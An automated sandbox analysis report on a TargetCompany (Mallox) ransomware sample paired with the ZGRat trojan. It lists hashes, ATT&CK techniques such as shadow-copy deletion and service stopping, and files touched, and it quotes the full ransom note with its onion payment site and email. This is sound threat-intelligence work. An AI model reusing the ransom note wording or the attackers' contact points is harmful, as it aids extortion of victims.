targetcompany | df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86

Analysis

max time kernel
80s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
27-02-2024 10:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Size

4.8MB
MD5

fccd0e6ed4dcf6d1b922762980fb5f8e
SHA1

cf13f9c5cf05e7188d22723fe3901b78b3d5e88c
SHA256

df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86
SHA512

2dd055d973501821d766bafe1c742863f5030f17a0399e0e67c96ece71c4fcb596b3a91b0f39d5da89a98ed14045b7652b3b7233bb54b9f1212183d6762633ad
SSDEEP

24576:JKMhfwBxch7B20eyMnCVuwCk7TU5HRYalVn3FPvIDLFU3+xJHIlw66BuSBn4Q71V:fqch7BZM+7TuxY7u6BuSB/1v7h

Score

10^/10

targetcompany zgrat evasion ransomware rat

Malware Config

Extracted

Path

C:\Users\Admin\Contacts\HOW TO RESTORE FILES.txt

Family

targetcompany

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: 1648584F7D8CE5D3ADEB4157 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Detect ZGRat V1 34 IoCs

resource	yara_rule
behavioral2/memory/2284-2-0x0000000005990000-0x0000000005A62000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-5-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-6-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-8-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-10-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-12-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-14-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-16-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-18-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-24-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-22-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-26-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-20-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-28-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-32-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-30-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-34-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-38-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-36-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-40-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-44-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-46-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-42-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-48-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-52-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-50-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-54-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-58-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-60-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-56-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-62-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-64-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-66-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1
behavioral2/memory/2284-68-0x0000000005990000-0x0000000005A5B000-memory.dmp	family_zgrat_v1

TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
ransomware targetcompany
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Detects command variations typically used by ransomware 2 IoCs

resource	yara_rule
behavioral2/memory/4408-1136-0x0000000000400000-0x000000000045C000-memory.dmp	INDICATOR_SUSPICIOUS_GENRansomware
behavioral2/memory/4408-26266-0x0000000000400000-0x000000000045C000-memory.dmp	INDICATOR_SUSPICIOUS_GENRansomware

Renames multiple (3477) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\E:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\A:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\H:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\Q:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\Y:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\G:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\L:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\T:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\U:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\W:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\M:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\N:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\P:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\X:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\O:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\R:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\S:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\D:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\B:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\I:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\J:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\K:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened (read-only)	\??\V:	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2284 set thread context of 4408	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe	95

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\de-de\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxslt.md	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ppd.xrm-ms	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\130\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-black_scale-100.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedLargeTile.scale-200_contrast-white.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated_contrast-white.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ms.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_de.properties	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppPackageBadgeLogo.scale-125.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-48_altform-unplated_contrast-white.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\Java\jdk-1.8\jre\legal\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EDGE\EDGE.ELM	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Toolkit\Images\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\jvm.hprof.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-80.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.Services.Store.Engagement_10.0.18101.0_x86__8wekyb3d8bbwe\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Trial-ul-oob.xrm-ms	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\THMBNAIL.PNG	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\SmallTile.scale-125.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-16_altform-unplated_contrast-white.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-pl.xrm-ms	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Preview.scale-200_layoutdir-RTL.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Images\contrast-standard\theme-light\Settings.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedWideTile.scale-100_contrast-black.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-16_contrast-black.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxSignature.p7x	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\LockScreenLogo.scale-125.png	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-RS\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Resources\Fonts\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\HOW TO RESTORE FILES.txt	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4032	sc.exe
5452	sc.exe
5580	sc.exe
1060	sc.exe
5928	sc.exe
5416	sc.exe
5364	sc.exe
436	sc.exe
5728	sc.exe
4340	sc.exe
5788	sc.exe
5620	sc.exe
676	sc.exe
5968	sc.exe
5992	sc.exe
5480	sc.exe
952	sc.exe
6032	sc.exe
5476	sc.exe
4300	sc.exe
5440	sc.exe
4692	sc.exe
8096	sc.exe
4240	sc.exe
1448	sc.exe
4876	sc.exe
4804	sc.exe
2156	sc.exe
5684	sc.exe
5896	sc.exe
2704	sc.exe
5548	sc.exe
3436	sc.exe
4952	sc.exe
3480	sc.exe
5860	sc.exe
5616	sc.exe
2784	sc.exe
5592	sc.exe
4336	sc.exe
5928	sc.exe
5484	sc.exe
5524	sc.exe
2420	sc.exe
5436	sc.exe
4588	sc.exe
5308	sc.exe
3988	sc.exe
1312	sc.exe
5640	sc.exe
5600	sc.exe
836	sc.exe
6092	sc.exe
5488	sc.exe
6140	sc.exe
2976	sc.exe
5216	sc.exe
6028	sc.exe
1568	sc.exe
7560	sc.exe
4828	sc.exe
208	sc.exe
5404	sc.exe
2060	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
5464	net.exe
5352	net.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2660	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
6072	Process not Found
7492	Process not Found
7788	Process not Found
5256	taskkill.exe
4004	taskkill.exe
2720	taskkill.exe
6324	taskkill.exe
5408	Process not Found
7328	Process not Found
8096	Process not Found
4876	taskkill.exe
5440	taskkill.exe
6528	taskkill.exe
5216	taskkill.exe
5284	Process not Found
5896	Process not Found
4360	taskkill.exe
4516	taskkill.exe
4924	taskkill.exe
1844	Process not Found
6932	Process not Found
7320	Process not Found
4392	taskkill.exe
5468	taskkill.exe
5984	taskkill.exe
7868	taskkill.exe
4732	Process not Found
3520	Process not Found
548	Process not Found
4388	taskkill.exe
6112	taskkill.exe
7940	taskkill.exe
7044	Process not Found
6988	Process not Found
3200	taskkill.exe
1604	taskkill.exe
8120	taskkill.exe
4592	taskkill.exe
1212	Process not Found
8164	Process not Found
6884	Process not Found
7472	Process not Found
1336	taskkill.exe
5968	taskkill.exe
8136	taskkill.exe
6412	Process not Found
7884	Process not Found
5640	Process not Found
3388	taskkill.exe
1664	Process not Found
5332	Process not Found
3896	taskkill.exe
5916	Process not Found
7948	Process not Found
724	Process not Found
3540	taskkill.exe
2660	taskkill.exe
4468	taskkill.exe
4032	taskkill.exe
464	taskkill.exe
760	taskkill.exe
7432	Process not Found
7484	Process not Found
208	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2284	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeTakeOwnershipPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeDebugPrivilege	4408	df12edb885d4e832139871c4a4c21179ce29c69bb41543928d633a636f0e8e86.exe
Token: SeDebugPrivilege	3292	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	1828	net1.exe
